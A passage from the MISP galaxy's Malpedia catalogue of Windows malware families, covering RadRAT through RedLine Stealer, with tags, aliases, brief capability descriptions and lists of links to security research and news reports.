The tag is: misp-galaxy:malpedia="RadRAT"

RadRAT is also known as:

Table 4373. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat

https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/

RagnarLocker (Windows)

The tag is: misp-galaxy:malpedia="RagnarLocker (Windows)"

RagnarLocker (Windows) is also known as:

Table 4374. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker

https://resources.prodaft.com/wazawaka-report

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/

https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/

https://seguranca-informatica.pt/ragnar-locker-malware-analysis/

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html

https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/

https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/

https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/

https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/

https://twitter.com/AltShiftPrtScn/status/1403707430765273095

https://www.acronis.com/en-sg/articles/ragnar-locker/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://securelist.com/targeted-ransomware-encrypting-data/99255/

https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information

https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/

https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html

https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html

https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

https://www.ic3.gov/Media/News/2022/220307.pdf

Rakhni

The tag is: misp-galaxy:malpedia="Rakhni"

Rakhni is also known as:

Table 4377. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni

https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/

Ramdo

The tag is: misp-galaxy:malpedia="Ramdo"

Ramdo is also known as:

Table 4379. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo

Ramnit

According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.

Ramnit campaigns have been observed to target organizations in particular industries. For example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.

The tag is: misp-galaxy:malpedia="Ramnit"

Ramnit is also known as:

  • Nimnul

Table 4380. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail

https://informationsecurity.report/Resources/Whitepapers/b201d876-c5df-486d-975e-2dc08eb85f02_W32.Ramnit%20analysis.pdf

https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html

http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html

https://redcanary.com/resources/webinars/deep-dive-process-injection/

https://www.youtube.com/watch?v=l6ZunH6YG0A

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/

https://securelist.com/financial-cyberthreats-in-2020/101638/

https://muha2xmad.github.io/unpacking/ramnit/

https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf

https://artik.blue/malware4

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/

https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/

http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html

https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89

http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html

https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/

http://www.secureworks.com/research/threat-profiles/gold-fairfax

https://www.youtube.com/watch?v=N4f2e8Mygag

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://research.checkpoint.com/ramnits-network-proxy-servers/

https://bin.re/blog/the-dga-of-ramnit/

Ranion

Ransomware.

The tag is: misp-galaxy:malpedia="Ranion"

Ranion is also known as:

Table 4383. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ranion

https://www.fortinet.com/blog/threat-research/ranion-ransomware-quiet-and-persistent-raas

Ranscam

The tag is: misp-galaxy:malpedia="Ranscam"

Ranscam is also known as:

Table 4384. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam

http://blog.talosintel.com/2016/07/ranscam.html

RansomEXX (Windows)

RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.

The tag is: misp-galaxy:malpedia="RansomEXX (Windows)"

RansomEXX (Windows) is also known as:

  • Defray777

  • Ransom X

Table 4386. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://github.com/Bleeping/Ransom.exx

https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/

https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/

https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html

https://www.youtube.com/watch?v=qxPXxWMI2i4

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.ic3.gov/Media/News/2021/211101.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3

https://www.sentinelone.com/anthology/ransomexx/

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/

SNC

Ransomware SNC is a ransomware who encrypts files and asks for a variable amount of Bitcoin before releasing the decryption key to your files. The threat actor asks to be contacted for negotiating the right ransom fee.

The tag is: misp-galaxy:malpedia="SNC"

SNC is also known as:

Table 4388. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomware_snc

https://yomi.yoroi.company/report/5deea91bac2ea1dcf5337ad8/5deead588a4518a7074dc6e6/overview

Rapid Ransom

InfinityGroup notes that Rapid Ransomware, unlike regular Ransomware, stays active on the computer after initially encrypting the systems and also encrypts any new files that are created. It does this by creating auto-runs that are designed to launch the ransomware and display the ransom note every time the infected system is started.

The tag is: misp-galaxy:malpedia="Rapid Ransom"

Rapid Ransom is also known as:

Table 4389. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom

https://twitter.com/malwrhunterteam/status/977275481765613569

https://twitter.com/malwrhunterteam/status/997748495888076800

https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://www.youtube.com/watch?v=LUxOcpIRxmg

RapidStealer

A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.

The tag is: misp-galaxy:malpedia="RapidStealer"

RapidStealer is also known as:

Table 4390. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer

http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html

rarstar

This ransomware encrypts all user’s data on the PC (photos, documents, excel tables, music, videos, etc), adds its specific extension to every file, and creates the HOW_TO_DECYPHER_FILES.txt files in every folder which contains encrypted files.

The tag is: misp-galaxy:malpedia="rarstar"

rarstar is also known as:

Table 4392. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

Raspberry Robin

Worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.

The tag is: misp-galaxy:malpedia="Raspberry Robin"

Raspberry Robin is also known as:

  • LINK_MSIEXEC

  • QNAP-Worm

  • RaspberryRobin

Table 4393. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin

https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm

https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/

https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/

https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe

https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

https://redcanary.com/blog/raspberry-robin/

https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html

https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/

https://unit42.paloaltonetworks.com/unsigned-dlls/

https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices

Ratankba

This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.

The tag is: misp-galaxy:malpedia="Ratankba"

Ratankba is also known as:

  • QUICKRIDE

Table 4394. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba

https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0

http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b

https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html

https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf

https://content.fireeye.com/apt/rpt-apt38

https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware

https://twitter.com/PhysicalDrive0/status/828915536268492800

Razy

Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.

The tag is: misp-galaxy:malpedia="Razy"

Razy is also known as:

Table 4399. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.razy

https://securelist.com/razy-in-search-of-cryptocurrency/89485/

RC2FM

A family identified by ESET Research in the InvisiMole campaign.

The tag is: misp-galaxy:malpedia="RC2FM"

RC2FM is also known as:

Table 4400. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rc2fm

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

rdasrv

The tag is: misp-galaxy:malpedia="rdasrv"

rdasrv is also known as:

Table 4403. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv

https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf

ReactorBot

Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.

The tag is: misp-galaxy:malpedia="ReactorBot"

ReactorBot is also known as:

Table 4405. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot

http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html

https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under

http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html

http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/

Reaver

Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the "Five Poisons" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.

The tag is: misp-galaxy:malpedia="Reaver"

Reaver is also known as:

Table 4406. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver

https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

RecordBreaker

This malware is a successor to Raccoon Stealer (also referred to as Raccoon Stealer 2.0), which is however a full rewrite in C/C++.

The tag is: misp-galaxy:malpedia="RecordBreaker"

RecordBreaker is also known as:

Table 4407. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://malwarebookreports.com/the-trash-panda-reemerges-from-the-dumpster-raccoon-stealer-v2/

https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-recordbreaker-f6400c11d58b

https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon

https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/

https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://socprime.com/blog/raccoon-stealer-detection-a-novel-malware-version-2-0-named-recordbreaker-offers-hackers-advanced-password-stealing-capabilities/

https://d01a.github.io/raccoon-stealer/

https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://asec.ahnlab.com/en/52072/

RedAlpha

The tag is: misp-galaxy:malpedia="RedAlpha"

RedAlpha is also known as:

Table 4408. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha

https://www.recordedfuture.com/redalpha-cyber-campaigns/

RedCap

According to Trend Micro, this backdoor receives valid domain credentials as an argument and uses it to log on to the Exchange Server and use it for data exfiltration purposes. The main function of this stage is to take the stolen password from the argument and send it to the attackers as an attachment in an email. We also observed that the threat actors relay these emails via government Exchange Servers using vaild accounts with stolen passwords.

The tag is: misp-galaxy:malpedia="RedCap"

RedCap is also known as:

Table 4409. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redcap

https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html

RedEnergy Stealer

According to Zscaler ThreatLabz, RedEnergy stealer uses a fake update campaign to target multiple industry verticals and possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities.The name of the malware was kept due to the common method names observed during the analysis.

The tag is: misp-galaxy:malpedia="RedEnergy Stealer"

RedEnergy Stealer is also known as:

Table 4411. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redenergy_stealer

https://www.zscaler.com/blogs/security-research/ransomware-redefined-redenergy-stealer-ransomware-attacks

RedLine Stealer

RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.

The tag is: misp-galaxy:malpedia="RedLine Stealer"

RedLine Stealer is also known as:

  • RECORDSTEALER

Table 4413. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

https://www.secureworks.com/research/darktortilla-malware-analysis

https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign

https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns

https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://www.youtube.com/watch?v=NI_Yw2t9zoo

https://www.microsoft.com/security/blog/2022/05/17/in-hot-pursuit-of-cryware-defending-hot-wallets-from-attacks/

https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md

https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882

https://dr4k0nia.github.io/posts/Unpacking-RedLine-Stealer/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://asec.ahnlab.com/en/30445/

https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns

https://unit42.paloaltonetworks.com/lapsus-group/

https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/

https://securityscorecard.com/research/detailed-analysis-redline-stealer

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout

https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html

https://www.bleepingcomputer.com/news/security/fake-windows-11-upgrade-installers-infect-you-with-redline-malware/

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://blog.netlab.360.com/purecrypter

https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service

https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.esentire.com/blog/redline-stealer-masquerades-as-photo-editing-software

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://embee-research.ghost.io/redline-stealer-basic-static-analysis-and-c2-extraction/

https://blog.eclecticiq.com/redline-stealer-variants-demonstrate-a-low-barrier-to-entry-threat

https://blog.morphisec.com/syk-crypter-discord

https://securityaffairs.co/wordpress/129391/hacking/lapsus-gang-compromised-microsoft-employees-account.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://www.atomicmatryoshka.com/post/cracking-open-the-malware-pi%C3%B1ata-series-intro-to-dynamic-analysis-with-redlinestealer

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/trellix-global-defenders-invaders-of-the-information-snatchers.html

https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer

https://securelist.com/malvertising-through-search-engines/108996/

https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html

https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/

https://www.qualys.com/docs/whitepapers/qualys-wp-fake-cracked-software-caught-peddling-redline-stealers-v220606.pdf

https://therecord.media/scattered-spider-ransomware-attacks-hospitality-retail

https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack

https://unit42.paloaltonetworks.com/bluesky-ransomware/

https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem

https://medium.com/@the_abjuri5t/advice-for-catching-a-redline-stealer-dca126867193

https://medium.com/@idan_malihi/redline-stealer-malware-analysis-76506ef723ab

https://embee-research.ghost.io/practical-queries-for-malware-infrastructure-part-3/

https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152

https://securityscorecard.pathfactory.com/all/a-detailed-analysis

https://thehackernews.com/2022/03/microsoft-and-okta-confirm-breach-by.html

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

https://blog.rootshell.be/2022/01/20/sans-isc-redline-stealer-delivered-through-ftp/

https://n1ght-w0lf.github.io/tutorials/yara-for-config-extraction/

https://ke-la.com/information-stealers-a-new-landscape/

https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.talosintelligence.com/2022/04/haskers-gang-zingostealer.html

https://isc.sans.edu/forums/diary/RedLine+Stealer+Delivered+Through+FTP/28258/

https://www.bitdefender.com/files/News/CaseStudies/study/415/Bitdefender-PR-Whitepaper-RedLine-creat6109-en-EN.pdf

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://asec.ahnlab.com/ko/25837/

https://embee-research.ghost.io/yara-rule-development-il-instructions-in-redline-malware/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/

https://asec.ahnlab.com/en/35981/

https://web.archive.org/web/20230606224056/https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152

https://www.youtube.com/watch?v=05-1Olqf6qw

https://medium.com/s2wblog/deep-analysis-of-redline-stealer-leaked-credential-with-wcf-7b31901da904

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://cyber-anubis.github.io/malware%20analysis/redline/

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html

https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload

https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/

https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer

https://embee-research.ghost.io/identifying-risepro-panels-using-censys/

https://russianpanda.com/2023/11/20/MetaStealer-Redline’s-Doppelganger/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://www.bitdefender.com/blog/labs/redline-stealer-resurfaces-in-fresh-rig-exploit-kit-campaign/

https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two

https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/

https://muha2xmad.github.io/malware-analysis/fullredline/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download

https://krebsonsecurity.com/2022/03/a-closer-look-at-the-lapsus-data-extortion-group/

https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/

